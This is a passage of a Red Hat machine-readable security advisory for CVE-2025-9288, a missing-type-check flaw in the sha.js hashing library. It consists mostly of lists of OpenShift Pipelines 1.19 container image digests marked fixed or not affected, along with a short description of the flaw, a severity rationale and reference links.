"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2389980"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in sha.js, where the hashing implementation does not perform sufficient input type validation. The .update() function accepts arbitrary objects, including those with crafted length properties, which can alter the internal state machine of the hashing process. This flaw may result in unexpected behavior such as rewinding the hash state, producing inconsistent digest outputs, or entering invalid processing loops. The issue was introduced due to the reliance on JavaScript object coercion rules rather than enforcing strict buffer or string inputs.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "sha.js: Missing type checks leading to hash rewind and passing on crafted data",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability was marked as Important rather then Critical because while the lack of input type checks in sha.js allows for hash state rewinding, crafted collisions, and potential denial of service, the vulnerability requires highly specific crafted input objects that are unlikely to occur in typical real-world usage, especially since most applications pass well-formed strings or buffers to hashing functions. Moreover, the cryptographic breakages described, such as nonce reuse leading to private key extraction, are indirect and depend on downstream libraries misusing sha.js for sensitive operations without additional validation layers. As a result, the flaw significantly undermines correctness and robustness of the hashing API, but its exploitability in common production systems is constrained, which could justify viewing it as an Important vulnerability rather than a Critical one.\n\n\nThe flaw requires applications to pass attacker-controlled, non-standard JavaScript objects into hash.update(). Most real-world Node.js applications and libraries already use Buffer, TypedArray, or String inputs, which are unaffected. Furthermore, Node\u2019s built-in crypto module, which is widely adopted, enforces stricter type-checking and is not impacted. As a result, the vulnerability mainly threatens projects that (a) directly depend on sha.js for cryptographically sensitive operations, and (b) hash untrusted input without type validation.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64"
],
"known_not_affected": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-9288"
},
{
"category": "external",
"summary": "RHBZ#2389980",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2389980"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-9288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9288"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9288",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9288"
},
{
"category": "external",
"summary": "https://github.com/browserify/sha.js/pull/78",
"url": "https://github.com/browserify/sha.js/pull/78"
},
{
